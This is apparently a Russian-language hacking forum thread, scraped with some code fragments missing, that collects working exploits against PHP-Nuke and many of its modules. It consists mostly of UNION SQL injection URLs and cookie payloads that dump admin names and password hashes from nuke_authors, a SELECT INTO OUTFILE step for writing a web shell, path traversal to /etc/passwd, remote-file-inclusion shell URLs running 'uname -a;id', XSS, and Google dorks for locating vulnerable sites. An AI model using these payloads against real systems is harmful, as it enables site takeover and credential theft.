![]() |
myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability
Код:
############################################################ |
изучал модуль Mediacatalog v3.1 в PHP Nuke 8.0
Код:
modules.php?name=Mediacatalog&pa=list_pag&cid=-1+union%0Aselect+aid,pwd+from+nuke_authorsКод:
modules.php?name=Mediacatalog&pa=Listcat&cidcat=-1+union%0Aselect+1,2,aid,3,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,pwd,24,25+from+nuke_authors-- |
SQL-Injection PHP-Nuke <= 8.0
SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)
/modules/Reviews/index.php Фрагмент уязвимого кода: PHP код:
PHP код:
PHP код:
Идем в /modules.php?name=Reviews&rop=showcontent&id=1 выбираем любую рецензию, жмем "Поместить комментарий" в куки кидаем Код:
base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)Зато через скулю в select при file_priv можно залить шелл, кидаем в куки: Код:
base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)правим сурс, там где написано имя темы, в моем случае value=RusNuke2003 пишем: Код:
<option value="/../../../../../../../tmp/" >RusNuke2003 |
Уязвимости модулей PHP-NUKE
Уязвимый продукт: PHP-NUKE module Pages
Версия: 1.0 Дорк: Pages © inurl:/modules.php?name=Pages SQL-injections Уязвимость в файле: index.php В модуле отсутствует какая-либо защита от sql-inj, поэтому не вижу смысла приводить фрагменты уязвимого кода, уязвимы все параметры Код:
/modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23 |
Уязвимый продукт: PHP-NUKE module video stream
Версия: 4.53 Дорк: inurl:name=Video_Stream SQL-injections Уязвимость в файле: watch.php PHP код:
Примеры запросов: Код:
/modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23PHP код:
Код:
POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1В этом модуле присуствуют сразу несколько sql-inj Примеры запросов: 1. /phpnuke/modules.php?name=Video_Stream&page=search в поле search: Код:
44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*Код:
POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1PHP код:
Код:
id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/* |
Уязвимый продукт: PHP-NUKE module auktion
Версия: 2.0 Дорк: inurl:modules.php?name=auktion SQL-injections В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах Примеры запросов: Код:
/modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21Код:
POST /modules.php?name=auktion&file=edititem HTTP/1.1 |
Уязвимый продукт: PHP-NUKE module NukeJokes
Версия: 2.2 Дорк: inurl:modules.php?name=NukeJokes SQL-injections Уязвимость в файле: index.php PHP код:
Пример запроса: Код:
/modules.php?name=NukeJokes&func=CatView&cat=-7'%0aunion+select+1,2%23PHP код:
Пример запроса: Код:
/modules.php?name=NukeJokes&func=JokeView&jokeid=-1'%0aunion+select+1,2,3,4,5,6,7,8%23PHP код:
Код:
POST /modules.php HTTP/1.1Уязвимость в файле: search.php PHP код:
Пример запроса: Код:
/modules.php?name=NukeJokes&file=search&func=search&q=x&cat=7%0aunion+select+1,2,3,4,5,6,7%23PHP код:
PHP код:
выбираем любую шутку, жмем добавить комментарий, в куки кидаем: Код:
author=aa',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1),Существующий_ID)/* |
В модулях:
Код:
http://site/modules.php?name=Search&type=comments&query=not123 exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authorsКод:
http://site/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwdКод:
http://site/modules.php?name=Private_Messages&file=index&folde r=inbox&mode=read&p=1&user=eDpmb28nIFVOSU9OIFNFTEV DVCAyLG51bGwsMSwxLG51bGwvKjoxКод:
http://site/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20pwd,%20aid%20FROM%20nuk e_authors%20--Код:
http://site/modules.php?name=Reviews&rop=savecomment&id=1& amp;uname=f00bar&score=999999999999999999999999Код:
http://site/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%2 0nuke_authors%20--Код:
http://site/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*В галерии: Код:
http://site/modules/My_eGallery/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwdКод:
Код:
http://site/modules/coppermine/upload.php?basepath=yourshell.txt?&cmd=uname%20-a;id;pwdКод:
http://site/modules/coppermine/themes/default/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwdКод:
http://site/modules/coppermine/include/init.inc.php?CPG_M_DIR=yourshell.txt?&cmd=uname -a;id;pwdКод:
http://site/modules/coppermine/themes/maze/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwdКод:
http://site/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwdКод:
http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=yourshell.txt?&c md=uname%20-a;id |
Инклуды:
Код:
http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=shell? |
XSS Версии: Код:
PHP-Nuke 7.3Код:
http://www.example.com/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here] |
| Время: 00:08 |